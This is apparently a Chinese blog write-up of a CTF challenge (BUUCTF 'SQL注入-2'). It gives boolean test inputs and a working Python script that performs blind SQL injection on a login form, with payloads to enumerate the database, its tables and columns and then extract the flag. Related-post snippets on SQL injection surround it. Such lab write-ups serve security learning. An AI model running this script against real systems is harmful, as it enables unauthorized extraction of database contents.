[第一章 web入门]SQL注入-2

最新推荐文章于 2024-05-09 22:06:37 发布
最新推荐文章于 2024-05-09 22:06:37 发布
阅读量322 收藏 1
点赞数 2
文章标签: sql ctf 笔记 题解 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2202_75361164/article/details/137378619
版权

[第一章 web入门]SQL注入-2

  • bool盲注

访问name=admin’ or 1=1#
访问name=admin’ or 1=0#
发现页面回显不同

1=1
image.png
1=0
image.png
payload

import requests
import time
url = 'http://eb258849-cbb2-4dfa-9b41-b0a067c60d6b.node5.buuoj.cn:81/login.php'
flag = ''

for i in range(1, 1000):
    high = 127
    low = 32
    mid = (low + high) // 2
    while high > low:
        # payload = f"1' or ascii(substr(database(),{i},1))>{mid}#"    #查库
        #payload = f"1' or ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='note'),{i},1))>{mid}#"   #查表
        #payload = f"1' or ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name)='fl4g'),{i},1))>{mid}#"   #查列
        payload = f"1' or ascii(substr((seleCt(flag)from(fl4g)),{i},1))>{mid}#"   #查数据
        data = {
            "name":payload,
            "pass":'qwer'
        }
        time.sleep(0.1)
        response = requests.post(url, data = data)
        if 'u6216' in response.text:
            low = mid + 1
        else:
            high = mid
        mid = (low + high) // 2
    if low != 32 :
        flag += chr(int(low))
    else:
        break
    print(flag)

image.png

尘佑不尘
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
web渗透测试详细入门实践课程-kali/sql注入
05-15
web渗透测试/渗透工具kali 渗透原理 渗透前期(网络踩点、网络扫描、网络查点) 渗透中期(利用漏洞信息进行渗透攻击、获取权限) 渗透后期(后渗透维持攻击、文件拷贝、代码植入、痕迹擦除) 渗透测试定义 渗透测试就是一种模拟恶意攻击者的技术与方法,挫败目标系统安全控制措施,取得访问控制权,并发现具备业务影响后果安全隐患的一种安全测试与评估方式。 本课程主要从渗透测试流程、情报收集流程、渗透测试metaspolit终端介绍、nmap扫描、文件包含漏洞、文件上传漏洞、sql注入等方面理论加实操web渗透测试详细专业技术知识。购买课程的同学可以获取价值200的教学资源包:包括虚拟机环境搭建的镜像、丰富的网络安全工具安装包和组网工具安装包等
Web入门Sql注入(二)
qq_51459823的博客
11-16 1077
通过触发 SQL 错误来诱导条件响应 在前面的示例中,假设应用程序执行相同的 SQL 查询,但根据查询是否返回任何数据,行为没有任何不同。前面的技术将不起作用,因为注入不同的布尔条件对应用程序的响应没有影响。 在这种情况下,根据注入的条件,通常可以通过有条件地触发 SQL 错误来诱导应用程序返回条件响应。这涉及修改查询,以便在条件为真时会导致数据库错误,但如果条件为假则不会。很多时候,数据库抛出的未处理的错误会导致应用程序的响应(例如错误消息)出现一些差异,从而使我们能够推断注入条件的真实性。 要查看
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析)
weixin_66146598的博客
06-09 4629
[BUUCTF][N1BOOK][第一章 web入门]SQL注入-2(详细解析),《从0到1:CTFer成长之路》书籍配套题目之sql注入。1、有的网站会开启错误调试信息方便开发者调试,可以利用报错信息进行报错注入2、updatexml第二个参数应为合法XPATH路径,否则会在引发报错的同时输出传入的参数3、dual用于测试数据库是否可以正常使用4、如果没有报错提示,可以bool注入...
WEB入门——SQL注入(二)
HasntStartIsOver的博客
06-03 276
二次注入和绕过
BUUCTF [第一章 web入门]SQL注入-2
qq_45707441的博客
12-22 2339
经分析后可知:当输入admin’ and 1=3# 时返回为假 {“error”:1,“msg”:"\u8d26\u53f7\u4e0d\u5b58\u5728"} 当输入admin’ and 1=1# 时返回为真{“error”:1,“msg”:"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"} 根据返回的字符串,我们可以写出解决的python脚本 #数据库名字长度 import string import requests url="http://e2cc3e..
SQL注入攻击与防御(安全技术经典译丛)
02-19
第2章 SQL注入测试  2.1 概述  2.2 寻找SQL注入  2.2.1 借助推理进行测试  2.2.2 数据库错误  2.2.3 应用响应  2.2.4 SQL盲注  2.3 确认SQL注入  2.3.1 区分数字和字符串  2.3.2 内联SQL注入  ...
SQL注入攻击与防御
10-04
第2章 SQL注入测试 21 2.1 概述 22 2.2 寻找SQL注入 22 2.2.1 借助推理进行测试 22 2.2.2 数据库错误 29 2.2.3 应用响应 38 2.2.4 SQL盲注 42 2.3 确认SQL注入 45 2.3.1 区分数字和字符串 46 2.3.2 内联SQL注入 46 ...
PHP和MySQL WEB开发(第4版)
05-31
第一篇 使用PHP 第1章 PHP快速入门教程 1.1 开始之前:了解PHP 1.2 创建一个示例应用:Bob汽车零部件商店 1.2.1 创建订单表单 1.2.2 表单处理 1.3 在HTML中嵌入PHP 1.3.1 使用PHP标记 1.3.2 PHP语句 1.3.3 空格 ...
PHP和MySQL Web开发第4版pdf以及源码
10-13
1.19 下一章 第2章 数据的存储与检索 2.1 保存数据以便后期使用 2.2 存储和检索Bob的订单 2.3 文件处理 2.4 打开文件 2.4.1 选择文件模式 2.4.2 使用fopen()打开文件 2.4.3 通过FTP或HTTP打开文件 2.4.4 ...
一道题讲懂SQL盲注 / [第一章 web入门]SQL注入-2
satasun的博客
12-13 2069
概述 本题是一个盲注题,可以基于布尔也可以基于时间,如果不会的话可以根据提示在网址后面加一个?tips=1降低难度成为一个基于报错的盲注。 解法一:基于时间 直接在前端进行注入的话没有报错回显,所以需要抓个包然后开始测试。 测库名 首先测试库名长度 name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd 等了3秒,我们默认是sleep1秒,但是不知道为什么睡的时间是输入的3-4倍左右,不管了,反正长度是4(1-4慢慢试) 然后测试
SQL-索引篇整理
m0_59925573的博客
05-03 1413
聚簇索引就是按照每张表的主键构造一颗B+树,同时叶子节点中存放的就是整张表的行记录数据,也将聚集索引的叶子节点称为数据页。索引需要额外的磁盘空间,并降低写操作的性能。3.使用短索引,如果对长字符串列进行索引,应该指定一个前缀长度,这样能够节省大量索引空间,如果搜索词超过索引前缀长度,则使用索引排除不匹配的行,然后检查其余行是否可能匹配。红黑树,1.每个节点都是红or黑 2.根节点是黑 3.每个叶子节点都是黑色 4.红色节点的父子节点都必须是黑的 5.从任一个节点到叶子节点的所有路径都包含相同的黑色结点。
Spring事务失效的场景
最新发布
qq_51967234的博客
05-09 542
因为Spring事务的本质是动态代理,通过生成代理对象去调用方法,并且在方法前后增加事务效果;同一类中的方法调用时,无法使用代理对象调用,使用的是this调用,因此无法实现动态代理效果。:考虑动态代理的实现原理,无论是基于JDK还是CGLib,都不允许final和static的修饰。: Spring默认只会在遇到error和RunTimeException时才会回滚。:使用catch进行捕获之后,Spring无法感知到异常,无法回滚。
常用SQL命令
wenxiaoba的博客
05-02 1601
常用SQL语句使用说明和示例
sql注入手注语句
2302_80044238的博客
05-03 428
id=1'and (ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)))=101 -- asd//爆表名。id=1' and(select count(table_name) from information_schema.tables where table_schema= database() )=4-- asd //查看库里有几个表。
SQL——高级教程【菜鸟教程】
weixin_45753504的博客
05-02 664
sql语句——连接
[第一章 web入门]sql注入-2
03-16
SQL注入是一种常见的网络攻击方式,攻击者通过在输入框中输入恶意代码,从而获取数据库中的敏感信息或者对数据库进行恶意操作。为了防止SQL注入攻击,我们需要对输入进行过滤和验证,同时使用参数化查询等安全措施来...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值